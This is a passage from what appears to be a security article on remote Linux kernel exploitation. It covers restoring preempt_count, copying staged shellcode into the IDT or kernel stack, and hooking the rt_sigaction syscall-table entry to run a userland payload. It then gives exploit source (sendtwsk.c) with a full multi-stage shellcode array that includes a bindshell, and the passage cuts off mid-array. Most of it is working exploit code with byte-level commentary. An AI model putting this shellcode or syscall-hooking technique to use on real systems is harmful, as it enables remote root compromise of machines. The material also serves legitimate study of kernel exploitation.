#define rcu_read_lock()         preempt_disable()

[...]

#define rcu_read_unlock()       preempt_enable()

< / >

< linux-2.6.15/include/linux/preempt.h >

# define add_preempt_count(val) do { preempt_count() += (val); } while (0)
# define sub_preempt_count(val) do { preempt_count() -= (val); } while (0)

[...]

#define inc_preempt_count() add_preempt_count(1)
#define dec_preempt_count() sub_preempt_count(1)

#define preempt_count() (current_thread_info()->preempt_count)

#ifdef CONFIG_PREEMPT

asmlinkage void preempt_schedule(void);

#define preempt_disable() \
do { \
        inc_preempt_count(); \
        barrier(); \
} while (0)

#define preempt_enable_no_resched() \
do { \
        barrier(); \
        dec_preempt_count(); \
} while (0)

#define preempt_check_resched() \
do { \
        if (unlikely(test_thread_flag(TIF_NEED_RESCHED))) \
                preempt_schedule(); \
} while (0)

#define preempt_enable() \
do { \
        preempt_enable_no_resched(); \
        barrier(); \
        preempt_check_resched(); \
} while (0)

#else

#define preempt_disable()               do { } while (0)
#define preempt_enable_no_resched()     do { } while (0)
#define preempt_enable()                do { } while (0)
#define preempt_check_resched()         do { } while (0)

#endif

< / >

As you can see, if CONFIG_PREEMPT is not set, all those operations are
just no-ops. 'preempt_disable()' is nestable, so it can be called multiple
times (preemption will be disabled until we call 'preempt_enable()' the
same number of times). That means that, given a PREEMPT kernel, we should
find a value equal to or greater than '1' inside preempt_count at 'exploit
time'. We can't just ignore that value or otherwise we'll BUG() later on
inside scheduler code (check preempt_schedule_irq() in kernel/sched.c).



What we have to do, on a PREEMPT kernel, is thus locate 'preempt_count'
and decrement it, just like 'rcu_read_unlock()' would do.

For the x86 architecture, 'preempt_count' is stored inside the 'struct
thread_info' :

< linux-2.6.15/include/asm-i386/thread_info.h >

struct thread_info {
        struct task_struct      *task;          /* main task structure */
        struct exec_domain      *exec_domain;   /* execution domain */
        unsigned long           flags;          /* low level flags */
        unsigned long           status;         /* thread-synchronous
                                                   flags */
        __u32                   cpu;            /* current CPU */
        int                     preempt_count;  /* 0 => preemptable, <0 =>
                                                   BUG */

        mm_segment_t            addr_limit;     /* thread address space:
                                                   0-0xBFFFFFFF for
                                                   user-thead
                                                   0-0xFFFFFFFF for
                                                   kernel-thread
                                                */
[...]

< / >

Let's see how we get to it :

 - locate the thread_info struct

 "\x89\xe0"                      // mov    %esp,%eax
 "\x25\x00\xe0\xff\xff"          // and    $0xffffe000,%eax

 - scan the thread_info struct to locate the addr_limit value. This value
   is a good fingerprint, since it is 0xc0000000 for a userland process
   and 0xffffffff for a kernel thread (or the idle task). [note that this
   kind of scan can be used to figure out in which kind of process we are,
   something that could be very important in some scenarios]

 /* scan: */
 "\x83\xc0\x04"                  // add    $0x4,%eax
 "\x8b\x18"                      // mov    (%eax),%ebx
 "\x83\xfb\xff"                  // cmp    $0xffffffff,%ebx
 "\x74\x0a"                      // je     804851e <end>
 "\x81\xfb\x00\x00\x00\xc0"      // cmp    $0xc0000000,%ebx
 "\x74\x02"                      // je     804851e <end>
 "\xeb\xec"                      // jmp    804850a <scan>

 - decrement the 'preempt_count' value [which is just the member above the
   addr_limit one]

 /* end: */
 "\xff\x48\xfc"                  // decl   0xfffffffc(%eax)

To improve further the shellcode it would be a good idea to perform a test 
over the preempt_count value, so that we would not end up into lowering it 
below zero. 
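
As a rough illustration of that improvement, and of the masking done by
'and $0xffffe000,%eax', here is a small userland model. It is a sketch
under our own assumptions: 'struct fake_thread_info' is a hypothetical
stand-in holding only the two members of interest, and both helper names
are ours.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, reduced stand-in for struct thread_info: only the
 * preempt_count member and the addr_limit member that follows it. */
struct fake_thread_info {
    int32_t  preempt_count;
    uint32_t addr_limit;
};

/* Base address of the kernel stack area (where thread_info lives) for a
 * given stack pointer. stack_size must be a power of two: 8192 gives the
 * 0xffffe000 mask used above, 4096 would give 0xfffff000. */
static uint32_t thread_info_base(uint32_t esp, uint32_t stack_size)
{
    assert(stack_size != 0 && (stack_size & (stack_size - 1)) == 0);
    return esp & ~(stack_size - 1);
}

/* Decrement preempt_count only if it is positive, so that it can never be
 * lowered below zero. Returns 1 if the counter was changed, 0 otherwise. */
static int guarded_preempt_dec(struct fake_thread_info *ti)
{
    assert(ti != NULL);
    if (ti->preempt_count <= 0)
        return 0;
    ti->preempt_count--;
    return 1;
}
```

In shellcode terms the guard would cost one extra compare and a
conditional jump around the 'decl' instruction.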


---[ 3.2.4 - Copying the Stub


We have just finished presenting a generic method to restore the stack
after a 'general mess-up' of the netfilter core call-frames.

What we have to do now is to find some place to store our shellcode, since
we can't (as we said before) directly execute from inside interrupt
context. [remember the note, this step and the following one are executed
before getting out from the softirq context].

Since we know almost nothing about the remote kernel image memory
mapping we need to find a 'safe place' to store the shellcode, that is, we
need to locate some memory region that we can for sure reference and that
won't create problems (read : Oops) if overwritten.

There are two places where we can copy our 'stage-2' shellcode :


 - IDT (Interrupt Descriptor Table) : we can easily get the IDT logical
   address at runtime (as we saw previously in the NULL dereference
   example) and Linux uses only the 0x80 software interrupt vector :

   +-----------------+
   | exception       |
   |    entries      |
   |-----------------|
   |  hw interrupt   |
   |      entries    |
   |-----------------| entry #32 ==+
   |                 |             |
   |  soft interrupt |             |
   |      entries    |             | usable gap
   |                 |             |
   |                 |           ==+
   |  int 0x80       | entry #128
   |                 |
   +-----------------+ <- offset limit

   Between entry #32 and entry #128 we have all unused descriptor
   entries, each 8 bytes long. Linux nowadays doesn't map that memory
   area as read-only [as it should be], so we can write on it [*].
   We have thus : (128 - 32) * 8 = 96 * 8 = 768 bytes, which is enough
   for our 'stage-2 shellcode'.


   [*] starting with the Linux kernel 2.6.20 it is possible to map some
       areas as read-only [the idt is just one of those]. Since we don't
       'start' writing into the IDT area and executing from there, it is
       possible to bypass that protection simply by directly modifying
       the kernel page table protections in 'previous stages' of the
       shellcode.


 - the current kernel stack : we need to make a little assumption here,
   that is being inside a process that would last for some time (until
   we're able to redirect kernel code over our shellcode, as we will
   see in the next section).
   Usually the stack doesn't grow up to 4kb, so we have an almost free
   4kb page for us (given that the remote system is using an 8kb stack
   space). To be safe, we can leave some pad space before the shellcode.
   We need to take care of the 'struct thread_info' saved at the
   'bottom' of the kernel stack (and that logically we don't want to
   overwrite ;) ) :

   +-----------------+
   | thread_info     |
   |-----------------|  ==+
   |                 |    | usable gap
   |                 |    |
   |-----------------|  ==+
   |                 |
   |       ^         |
   |       |         |  [ normally the stack doesn't ]
   |       |         |  [ grow over 4kb              ]
   |                 |
   |  ring0 stack    |
   +-----------------+

   Altogether we have : (8192 - 4096) - sizeof(descriptor) - pad ~= 2048
   bytes, which is even more than before.

   With a more complex shellcode we can traverse the process table and
   look for a 'safe process' (init, some kernel thread, some main
   server process).
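
To double check the space available in the two candidate areas, the
capacity arithmetic can be written down as two tiny helpers. This is just a
worked calculation: the function names are ours, and the descriptor size
and pad values passed to the second helper are placeholders, since the real
ones depend on the target kernel.

```c
#include <assert.h>
#include <stddef.h>

#define IDT_ENTRY_SIZE 8        /* bytes per x86 (32-bit) IDT descriptor */

/* Bytes available between the first unused IDT entry and the first entry
 * that must be preserved (e.g. 32 and 128 in the layout above). */
static size_t idt_gap_bytes(unsigned first_free, unsigned first_used)
{
    assert(first_used >= first_free);
    return (size_t)(first_used - first_free) * IDT_ENTRY_SIZE;
}

/* Bytes usable at the 'bottom' of the kernel stack: total stack size minus
 * the depth we assume the stack can reach, the descriptor stored at the
 * bottom and a safety pad. */
static size_t stack_gap_bytes(size_t stack_size, size_t max_depth,
                              size_t descriptor_size, size_t pad)
{
    assert(stack_size >= max_depth + descriptor_size + pad);
    return stack_size - max_depth - descriptor_size - pad;
}
```

For instance idt_gap_bytes(32, 128) evaluates to 768, and
stack_gap_bytes(8192, 4096, 64, 1984) to 2048 (64 and 1984 being purely
illustrative values for the descriptor size and the pad).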


Let's have a look at the shellcode performing that task :

 - get the stack address where we are [the uber-famous call/pop trick]

 "\xe8\x00\x00\x00\x00"         // call   51 <search+0x29>
 "\x59"                         // pop    %ecx

 - scan the stack until we find the 'start marker' of our stage-2 stub.
   We put a \xaa byte at the start of it, and it's the only one present in
   the shellcode. The add $0x10 is there just to start scanning after the
   'cmp $0xaa,%al', which would otherwise give a false positive for \xaa.

 "\x83\xc1\x10"                 // add    $0x10,%ecx
 "\x41"                         // inc    %ecx
 "\x8a\x01"                     // mov    (%ecx),%al
 "\x3c\xaa"                     // cmp    $0xaa,%al
 "\x75\xf9"                     // jne    52 <search+0x2a>

 - we have found the start of the shellcode, let's copy it in the 'safe
   place' until the 'end marker' (\xbb). The 'safe place' here is saved
   inside the %esi register. We haven't shown how we calculated it because
   it directly derives from the shellcode used in the next section (it's
   simply somewhere in the stack space). This code could be optimized by
   saving the 'stage-2' stub size in %ecx and using rep/repnz in
   conjunction with mov instructions.

 "\x41"                         // inc    %ecx
 "\x8a\x01"                     // mov    (%ecx),%al
 "\x88\x06"                     // mov    %al,(%esi)
 "\x46"                         // inc    %esi
 "\x41"                         // inc    %ecx
 "\x80\x39\xbb"                 // cmpb   $0xbb,(%ecx)
 "\x75\xf5"                     // jne    5a <search+0x32>


[during the development phase of the exploit we changed the 'stage-2'
part a couple of times, that's why we left that kind of copy
operation, even if it's less elegant :) ]
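
The marker-delimited copy described above can be sketched in C over an
ordinary byte buffer. This is only a bounds-checked illustration of the
idea (scan for a start byte, copy until an end byte); the function name
and the return convention are ours, not part of the exploit.

```c
#include <stddef.h>

#define START_MARKER 0xaa   /* marks the first byte before the payload */
#define END_MARKER   0xbb   /* marks the first byte after the payload  */

/*
 * Copy the bytes found strictly between START_MARKER and END_MARKER
 * from src into dst. Returns the number of bytes copied, or 0 when a
 * marker is missing or dst is too small.
 */
static size_t copy_between_markers(const unsigned char *src, size_t src_len,
                                   unsigned char *dst, size_t dst_len)
{
    size_t i = 0;
    size_t copied = 0;

    /* scan until the start marker */
    while (i < src_len && src[i] != START_MARKER)
        i++;
    if (i == src_len)
        return 0;
    i++;                              /* step over the start marker */

    /* byte-by-byte copy until the end marker */
    while (i < src_len && src[i] != END_MARKER) {
        if (copied == dst_len)
            return 0;                 /* destination too small */
        dst[copied++] = src[i++];
    }
    if (i == src_len)
        return 0;                     /* end marker never found */

    return copied;
}
```

As in the text, the scheme only works when the marker values never appear
inside the payload itself; knowing the payload size in advance would allow
a single memcpy() instead, which mirrors the rep-based optimization
mentioned above.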


---[ 3.2.5 - Executing Code in Userspace Context [Gimme Life! ] 


Okay, we have a 'safe place', all we need now is a 'safe moment', that is
a process context to execute in. The first 'easy' solution that could come
to your mind could be overwriting the #128 software interrupt [int $0x80],
so that it points to our code. The first process issuing a system call
would thus become our 'victim process-context'.

This approach has, though, two major drawbacks :


 - we have no way to intercept processes using sysenter to access kernel
   space (what if all were using it ? It would be a pretty odd way to
   fail ;) )


 - we can't control which process is 'hooked' and that might be
   'disastrous' if the process is the init one or a critical one,
   since we'll borrow its userspace to execute our shellcode (a bindshell
   or a connect-back is not a short-lasting process).


We have to go a little deeper inside the kernel to achieve a good
hooking. Our choice was to use the syscall table and to redirect a system
call which has a high probability of being called and that we're almost
sure isn't used inside init or any critical process.

Our choice, after a couple of tests, was to hook the rt_sigaction syscall, 
but it’s not the only one. It just worked pretty well for us. 


To locate correctly in memory the syscall table we use the stub of code 
that sd and devik presented in their phrack paper [23] about /dev/kmem 
patching: 


- we get the current stack address, calculate the start of the
  thread_struct and we add 0x1000 (pad gap) [symbolic value far enough
  from both the end of the thread_struct and the top of stack]. Here is
  where we set that %esi value that we have presented as 'magically
  already there' in the shellcode-part discussed before.


  "\x89\xe6"                         // mov    %esp, %esi
  "\x81\xe6\x00\xe0\xff\xff"         // and    $0xffffe000, %esi
  "\x81\xc6\x00\x10\x00\x00"         // add    $0x1000, %esi

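
The address arithmetic of that step can be written out in C. This is a
sketch assuming the 8kb, 8kb-aligned kernel stack used throughout the
text; the helper names are ours. It also shows where the two 4-byte slots
stored just before the 'safe place' end up, which explains the 0xff8 and
0xffc offsets that show up in the restore code.

```c
#include <stdint.h>

#define THREAD_SIZE 0x2000u   /* 8kb kernel stack, as assumed in the text */
#define SAFE_OFFSET 0x1000u   /* the "pad gap" added to the stack base    */

/* Start of the 8kb-aligned stack area containing esp. */
static uint32_t stack_base(uint32_t esp)
{
    return esp & ~(THREAD_SIZE - 1u);   /* same as: and $0xffffe000 */
}

/* Destination address for the copied stub. */
static uint32_t safe_place(uint32_t esp)
{
    return stack_base(esp) + SAFE_OFFSET;
}

/* Slots stored just before the safe place (offsets -8 and -4). */
static uint32_t saved_entry_slot(uint32_t esp)   { return safe_place(esp) - 8u; }
static uint32_t saved_handler_slot(uint32_t esp) { return safe_place(esp) - 4u; }
```

For an example stack pointer of 0xc1235f40 the base is 0xc1234000, the
safe place is 0xc1235000, and the two saved slots sit at base + 0xff8 and
base + 0xffc.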

- sd & devik slightly re-adapted code


  "\x0f\x01\x0e"                     // sidtl  (%esi)
  "\x8b\x7e\x02"                     // mov    0x2(%esi), %edi
  "\x81\xc7\x00\x04\x00\x00"         // add    $0x400, %edi
  "\x66\x8b\x5f\x06"                 // mov    0x6(%edi), %bx
  "\xc1\xe3\x10"                     // shl    $0x10, %ebx
  "\x66\x8b\x1f"                     // mov    (%edi), %bx
  "\x43"                             // inc    %ebx
  "\x8a\x03"                         // mov    (%ebx), %al
  "\x3c\xff"                         // cmp    $0xff, %al
  "\x75\xf9"                         // jne    28 <search>
  "\x8a\x43\x01"                     // mov    0x1(%ebx), %al
  "\x3c\x14"                         // cmp    $0x14, %al
  "\x75\xf2"                         // jne    28 <search>
  "\x8a\x43\x02"                     // mov    0x2(%ebx), %al
  "\x3c\x85"                         // cmp    $0x85, %al
  "\x75\xeb"                         // jne    28 <search>
  "\x8b\x5b\x03"                     // mov    0x3(%ebx), %ebx

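
The logic of that stub is easier to follow in C. The sketch below works
on plain byte arrays rather than on live kernel memory: it rebuilds a
32-bit handler address from the two 16-bit halves of an 8-byte gate
descriptor, then scans a code buffer for the ff 14 85 byte sequence and
reads the 32-bit operand that follows it. Function names are ours and the
sample bytes in the usage note are made up.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * An x86 gate descriptor keeps the low 16 bits of the handler offset in
 * bytes 0-1 and the high 16 bits in bytes 6-7.
 */
static uint32_t gate_offset(const unsigned char gate[8])
{
    uint32_t lo = (uint32_t)gate[0] | ((uint32_t)gate[1] << 8);
    uint32_t hi = (uint32_t)gate[6] | ((uint32_t)gate[7] << 8);
    return (hi << 16) | lo;
}

/*
 * Look for the bytes ff 14 85 and return the little-endian 32-bit value
 * that follows them. Returns 1 and fills *operand on success, 0 if the
 * pattern is not present in the buffer.
 */
static int find_indirect_call_operand(const unsigned char *code, size_t len,
                                      uint32_t *operand)
{
    for (size_t i = 0; i + 7 <= len; i++) {
        if (code[i] == 0xff && code[i + 1] == 0x14 && code[i + 2] == 0x85) {
            *operand = (uint32_t)code[i + 3]
                     | ((uint32_t)code[i + 4] << 8)
                     | ((uint32_t)code[i + 5] << 16)
                     | ((uint32_t)code[i + 6] << 24);
            return 1;
        }
    }
    return 0;
}
```

With a gate of { 0x34, 0x12, 0x60, 0x00, 0x00, 0xef, 0x10, 0xc0 } the
first helper returns 0xc0101234. Unlike the shellcode, the C version is
bounded by len, so it cannot run off the end of the buffer when the
pattern is missing.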

- logically we need to save the original address of the syscall somewhere,
  and we decided to put it just before the 'stage-2' shellcode :


  "\x81\xc3\xb8\x02\x00\x00"         // add    $0x2b8, %ebx
  "\x89\x5e\xf8"                     // movl   %ebx, 0xfffffff8(%esi)
  "\x8b\x13"                         // mov    (%ebx), %edx
  "\x89\x56\xfc"                     // mov    %edx, 0xfffffffc(%esi)
  "\x89\x33"                         // mov    %esi, (%ebx)


As you see, we save the address of the rt_sigaction entry [offset 0x2b8]
inside the syscall table (we will need it at restore time, so that we
won't have to calculate it again) and the original address of the function
itself (its counterpart in the restoring phase). We make the rt_sigaction
entry point to our shellcode : %esi. Now it should be even clearer why, in
the previous section, we 'magically' had the destination address to copy
our stub into in %esi.
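
The bookkeeping described here (remember which slot was patched and what
it used to contain, so that it can be put back later) can be shown on an
ordinary userspace table of function pointers. This is only an analogy
under our own names; it also checks that 0x2b8 is simply 174 * 4, 174
being the rt_sigaction syscall number on i386.

```c
#include <stddef.h>

#define NR_RT_SIGACTION 174u   /* rt_sigaction syscall number on i386  */
#define ENTRY_SIZE      4u     /* table entries are 32-bit pointers    */

typedef long (*handler_t)(void);

struct hook_state {
    handler_t *entry;      /* address of the patched table slot   */
    handler_t  original;   /* pointer that was stored in the slot */
};

/* Byte offset of entry nr inside a table of 32-bit pointers. */
static size_t table_offset(unsigned nr)
{
    return (size_t)nr * ENTRY_SIZE;
}

/* Save the slot address and its old content, then redirect the slot. */
static void hook(struct hook_state *st, handler_t *table, unsigned nr,
                 handler_t replacement)
{
    st->entry    = &table[nr];
    st->original = table[nr];
    table[nr]    = replacement;
}

/* Put the saved pointer back; no need to locate the slot again. */
static void unhook(const struct hook_state *st)
{
    *st->entry = st->original;
}

/* Two stand-in handlers for the usage example. */
static long demo_original(void)    { return 1; }
static long demo_replacement(void) { return 2; }
```

After hook() on a table whose slot 174 holds demo_original, calling the
slot returns 2; after unhook() it returns 1 again.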


The first process issuing a rt_sigaction call will just give life to the
stage-2 shellcode, which is the final step before getting the connect-back
or the bindshell executed. [or whatever shellcode you like more ;) ]

We're still in kernel land, while our final goal is to execute a userland
shellcode, so we still have to perform a bunch of operations.


There are basically two methods (not the only two, but probably the easiest
and most effective ones) to achieve our goal :


 - find saved EIP, temporarily disable the WP control register flag, copy
   the userland shellcode over there and re-enable the WP flag [it could be
   potentially dangerous on SMP]. If the syscall is called through
   sysenter, the saved EIP points into the vsyscall table, so we must 'scan'
   the stack 'until ret' (not much different from what we do in the
   stack frame recovery step, just easier here), to get the real
   userspace saved EIP after the vsyscall 'return' :


   0xffffe410 <__kernel_vsyscall+16>:      pop    %ebp
   0xffffe411 <__kernel_vsyscall+17>:      pop    %edx
   0xffffe412 <__kernel_vsyscall+18>:      pop    %ecx
   0xffffe413 <__kernel_vsyscall+19>:      ret


   As you can see, the first executed userspace address (writable) is at
   saved *(ESP + 12).


 - find saved ESP or use syscall saved parameters pointing to a userspace
   buffer, copy the shellcode in that memory location and overwrite the
   saved EIP with saved ESP (or userland buffer address)


The second method is preferable (easier and safer), but if we're dealing
with an architecture supporting the NX-bit or with a software patch that
emulates the execute bit (to mark the stack and eventually the heap as
non-executable), we have to fall back to the first, more intrusive, method,
or our userland process will just segfault while attempting to execute the
shellcode. Since we do have full control of the process-related kernel
data we can also copy the shellcode in a given place and modify page
protection. [not different from the idea proposed above for IDT read-only
in the 'Copy the Stub' section]


Once again, let's go on with the dirty details :


- the usual call/pop trick to get the address we're executing from


  "\xe8\x00\x00\x00\x00"             // call   8 <func+0x8>
  "\x59"                             // pop    %ecx


- patch back the syscall table with the original rt_sigaction address
  [if those 0xff8 and 0xffc have no meaning for you, just remember that we
  added 0x1000 to the thread_struct stack address to calculate our 'safe
  place' and that we stored just before both the syscall table entry
  address of rt_sigaction and the function address itself]


  "\x81\xe1\x00\xe0\xff\xff"         // and    $0xffffe000, %ecx
  "\x8b\x99\xf8\x0f\x00\x00"         // mov    0xff8(%ecx), %ebx
  "\x8b\x81\xfc\x0f\x00\x00"         // mov    0xffc(%ecx), %eax
  "\x89\x03"                         // mov    %eax, (%ebx)


- locate Userland ESP and overwrite Userland EIP with it [method 2]


  "\x8b\x74\x24\x38"                 // mov    0x38(%esp), %esi
  "\x89\x74\x24\x2c"                 // mov    %esi, 0x2c(%esp)
  "\x31\xc0"                         // xor    %eax, %eax


- once again we use a marker (\x22) to locate the shellcode we want to
  copy on process stack. Let's call it 'stage-3' shellcode.
  We use just another simple trick here to locate the marker and avoid a
  false positive : instead of jumping after (as we did for the \xaa one)
  we set the '(marker value) - 1' in %al and then increment it.
  The copy is exactly the same (with the same 'note') we saw before


  "\xb0\x21"                         // mov    $0x21, %al
  "\x40"                             // inc    %eax
  "\x41"                             // inc    %ecx
  "\x38\x01"                         // cmp    %al, (%ecx)
  "\x75\xfb"                         // jne    2a <func+0x2a>
  "\x41"                             // inc    %ecx
  "\x8a\x19"                         // mov    (%ecx), %bl
  "\x88\x1e"                         // mov    %bl, (%esi)
  "\x41"                             // inc    %ecx
  "\x46"                             // inc    %esi
  "\x38\x01"                         // cmp    %al, (%ecx)
  "\x75\xf6"                         // jne    30 <func+0x30>


- return from the syscall and let the process cleanly exit to userspace.
  Control will be transferred to our modified EIP and shellcode will be
  executed


  "\xc3"                             // ret


We have used a 'fixed' value to locate userland ESP/EIP, which worked well
for the 'standard' kernels/apps we tested it on (getting to the syscall via
int $0x80). With a little more effort (worth the time) you can avoid those
offset assumptions by implementing code similar to the one for the Stack
Frame Recovery technique.


Just take a look at how the current userland EIP, ESP, CS and SS are saved
before jumping to kernel level :


ring0 stack:
+--------+
|   SS   |
|  ESP   | <--- saved ESP
| EFLAGS |
|   CS   |
|  EIP   | <--- saved EIP
|  ....  |
+--------+


All 'unpatched' kernels will have the same value for SS and CS and we can
use it as a fingerprint to locate ESP and EIP (that we can test to be
below PAGE_OFFSET [*])


[*] As we already said, on latest kernels there could be a different
    uspace/kspace split address than 0xc0000000 [2G/2G or 1G/3G
    configurations]


We won't show here the 'stage-3' shellcode since it is a standard
'userland' bindshell one. Just use the one you need depending on the
environment.


---[ 3.2.6 - The Code : sendtwsk.c


< stuff/expl/sendtwsk.c >


#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>   /* inet_addr(), htons() */


/* from vuln module */
#define MAX_TWSKCHUNK 30
/* end */


#define NOP 0x90


#define OVERFLOW_NEED   20


#define JUMP "\xe9\x07\xfe\xff\xff"
#define SIZE_JMP        (sizeof(JUMP) -1)


#define TWSK_PACKET_LEN (((MAX_TWSKCHUNK * sizeof(struct twsk_chunk)) + \
                        OVERFLOW_NEED) + SIZE_JMP \
                        + sizeof(struct twsk) + sizeof(struct iphdr))


#define TWSK_PROTO      37


#define DEFAULT_VSYSCALL_RET 0xffffe413
#define DEFAULT_VSYSCALL_JMP 0xc01403c0


/*
 * find the correct value..
 alpha:/usr/src/linux/debug/article/remote/figaro/ip_figaro# ./roll
 val: 2147483680, 80000020 result: 512
 val: 2147483681, 80000021 result: 528
*/
#define NEGATIVE_CHUNK_NUM 0x80000020
char shellcode[]=
/* hook sys_rtsigaction() and copy the 2level shellcode (72) */
  "\x90\x90"                     // nop; nop; [alignment]
  "\x89\xe6"                     // mov    %esp, %esi
  "\x81\xe6\x00\xe0\xff\xff"     // and    $0xffffe000, %esi
  "\x81\xc6\x00\x10\x00\x00"     // add    $0x1000, %esi
  "\x0f\x01\x0e"                 // sidtl  (%esi)
  "\x8b\x7e\x02"                 // mov    0x2(%esi), %edi
  "\x81\xc7\x00\x04\x00\x00"     // add    $0x400, %edi
  "\x66\x8b\x5f\x06"             // mov    0x6(%edi), %bx
  "\xc1\xe3\x10"                 // shl    $0x10, %ebx
  "\x66\x8b\x1f"                 // mov    (%edi), %bx
  "\x43"                         // inc    %ebx
  "\x8a\x03"                     // mov    (%ebx), %al
  "\x3c\xff"                     // cmp    $0xff, %al
  "\x75\xf9"                     // jne    28 <search>
  "\x8a\x43\x01"                 // mov    0x1(%ebx), %al
  "\x3c\x14"                     // cmp    $0x14, %al
  "\x75\xf2"                     // jne    28 <search>
  "\x8a\x43\x02"                 // mov    0x2(%ebx), %al
  "\x3c\x85"                     // cmp    $0x85, %al
  "\x75\xeb"                     // jne    28 <search>
  "\x8b\x5b\x03"                 // mov    0x3(%ebx), %ebx [get sys_call_table]
  "\x81\xc3\xb8\x02\x00\x00"     // add    $0x2b8, %ebx [get sys_rt_sigaction offset]
  "\x89\x5e\xf8"                 // movl   %ebx, 0xfffffff8(%esi) [save sys_rt_sigaction]
  "\x8b\x13"                     // mov    (%ebx), %edx
  "\x89\x56\xfc"                 // mov    %edx, 0xfffffffc(%esi)
  "\x89\x33"                     // mov    %esi, (%ebx) [make sys_rt_sigaction point to our shellcode]
  "\xe8\x00\x00\x00\x00"         // call   51 <search+0x29>
  "\x59"                         // pop    %ecx
  "\x83\xc1\x10"                 // addl   $0x10, %ecx
  "\x41"                         // inc    %ecx
  "\x8a\x01"                     // mov    (%ecx), %al
  "\x3c\xaa"                     // cmp    $0xaa, %al
  "\x75\xf9"                     // jne    52 <search+0x2a>
  "\x41"                         // inc    %ecx
  "\x8a\x01"                     // mov    (%ecx), %al
  "\x88\x06"                     // mov    %al, (%esi)
  "\x46"                         // inc    %esi
  "\x41"                         // inc    %ecx
  "\x80\x39\xbb"                 // cmpb   $0xbb, (%ecx)
  "\x75\xf5"                     // jne    5a <search+0x32>

/* find and decrement preempt counter (32) */
  "\x89\xe0"                     // mov    %esp, %eax
  "\x25\x00\xe0\xff\xff"         // and    $0xffffe000, %eax
  "\x83\xc0\x04"                 // add    $0x4, %eax
  "\x8b\x18"                     // mov    (%eax), %ebx
  "\x83\xfb\xff"                 // cmp    $0xffffffff, %ebx
  "\x74\x0a"                     // je     804851e <end>
  "\x81\xfb\x00\x00\x00\xc0"     // cmp    $0xc0000000, %ebx
  "\x74\x02"                     // je     804851e <end>
  "\xeb\xec"                     // jmp    804850a <scan>
  "\xff\x48\xfc"                 // decl   0xfffffffc(%eax)

/* stack frame recovery step */
  "\x58"                         // pop    %eax
  "\x83\x3c\x24\x02"             // cmp    $0x2, (%esp)
  "\x75\xf9"                     // jne    8048330 <do_unroll>
  "\x83\x7c\x24\x04\x01"         // cmp    $0x1, 0x4(%esp)
  "\x75\xf2"                     // jne    8048330 <do_unroll>
  "\x83\x7c\x24\x10\x00"         // cmp    $0x0, 0x10(%esp)
  "\x75\xeb"                     // jne    8048330 <do_unroll>
  "\x8d\x64\x24\xfc"             // lea    0xfffffffc(%esp), %esp
  "\x8b\x04\x24"                 // mov    (%esp), %eax
  "\x89\xc3"                     // mov    %eax, %ebx
  "\x03\x43\xfc"                 // add    0xfffffffc(%ebx), %eax
  "\x40"                         // inc    %eax
  "\x8a\x18"                     // mov    (%eax), %bl
  "\x80\xfb\xc3"                 // cmp    $0xc3, %bl
  "\x75\xf8"                     // jne    8048351 <do_unroll+0x21>
  "\x80\x78\xff\x88"             // cmpb   $0x88, 0xffffffff(%eax)
  "\x74\xf2"                     // je     8048351 <do_unroll+0x21>
  "\x80\x78\xff\x89"             // cmpb   $0x89, 0xffffffff(%eax)
  "\x74\xec"                     // je     8048351 <do_unroll+0x21>
  "\x31\xc9"                     // xor    %ecx, %ecx
  "\x48"                         // dec    %eax
  "\x8a\x18"                     // mov    (%eax), %bl
  "\x80\xe3\xf0"                 // and    $0xf0, %bl
  "\x80\xfb\x50"                 // cmp    $0x50, %bl
  "\x75\x03"                     // jne    8048375 <do_unroll+0x45>
  "\x41"                         // inc    %ecx
  "\xeb\xf2"                     // jmp    8048367 <do_unroll+0x37>
  "\x40"                         // inc    %eax
  "\x89\xc6"                     // mov    %eax, %esi
  "\x31\xc0"                     // xor    %eax, %eax
  "\xb0\x04"                     // mov    $0x4, %al
  "\xf7\xe1"                     // mul    %ecx
  "\x29\xc4"                     // sub    %eax, %esp
  "\x31\xc0"                     // xor    %eax, %eax
  "\xff\xe6"                     // jmp    *%esi
/* end of stack frame recovery */

/* stage-2 shellcode */
  "\xaa"                         // border stage-2 start
  "\xe8\x00\x00\x00\x00"         // call   8 <func+0x8>
  "\x59"                         // pop    %ecx
  "\x81\xe1\x00\xe0\xff\xff"     // and    $0xffffe000, %ecx
  "\x8b\x99\xf8\x0f\x00\x00"     // mov    0xff8(%ecx), %ebx
  "\x8b\x81\xfc\x0f\x00\x00"     // mov    0xffc(%ecx), %eax
  "\x89\x03"                     // mov    %eax, (%ebx)
  "\x8b\x74\x24\x38"             // mov    0x38(%esp), %esi
  "\x89\x74\x24\x2c"             // mov    %esi, 0x2c(%esp)
  "\x31\xc0"                     // xor    %eax, %eax
  "\xb0\x21"                     // mov    $0x21, %al
  "\x40"                         // inc    %eax
  "\x41"                         // inc    %ecx
  "\x38\x01"                     // cmp    %al, (%ecx)
  "\x75\xfb"                     // jne    2a <func+0x2a>
  "\x41"                         // inc    %ecx
  "\x8a\x19"                     // mov    (%ecx), %bl
  "\x88\x1e"                     // mov    %bl, (%esi)
  "\x41"                         // inc    %ecx
  "\x46"                         // inc    %esi
  "\x38\x01"                     // cmp    %al, (%ecx)
  "\x75\xf6"                     // jne    30 <func+0x30>
  "\xc3"                         // ret

  "\x22"                         // border stage-3 start
  "\x31\xdb"                     // xor    ebx, ebx
  "\xf7\xe3"                     // mul    ebx
  "\xb0\x66"                     // mov    al, 102
  "\x53"                         // push   ebx
  "\x43"                         // inc    ebx
  "\x53"                         // push   ebx
  "\x43"                         // inc    ebx
  "\x53"                         // push   ebx
  "\x89\xe1"                     // mov    ecx, esp
  "\x4b"                         // dec    ebx
  "\xcd\x80"                     // int    80h
  "\x89\xc7"                     // mov    edi, eax
  "\x52"                         // push   edx
  "\x66\x68\x4e\x20"             // push   word 8270
  "\x43"                         // inc    ebx
  "\x66\x53"                     // push   bx
  "\x89\xe1"                     // mov    ecx, esp
  "\xb0\xef"                     // mov    al, 239
  "\xf6\xd0"                     // not    al
  "\x50"                         // push   eax
  "\x51"                         // push   ecx
  "\x57"                         // push   edi
  "\x89\xe1"                     // mov    ecx, esp
  "\xb0\x66"                     // mov    al, 102
  "\xcd\x80"                     // int    80h
  "\xb0\x66"                     // mov    al, 102
  "\x43"                         // inc    ebx
  "\x43"                         // inc    ebx
  "\xcd\x80"                     // int    80h
  "\x50"                         // push   eax
  "\x50"                         // push   eax
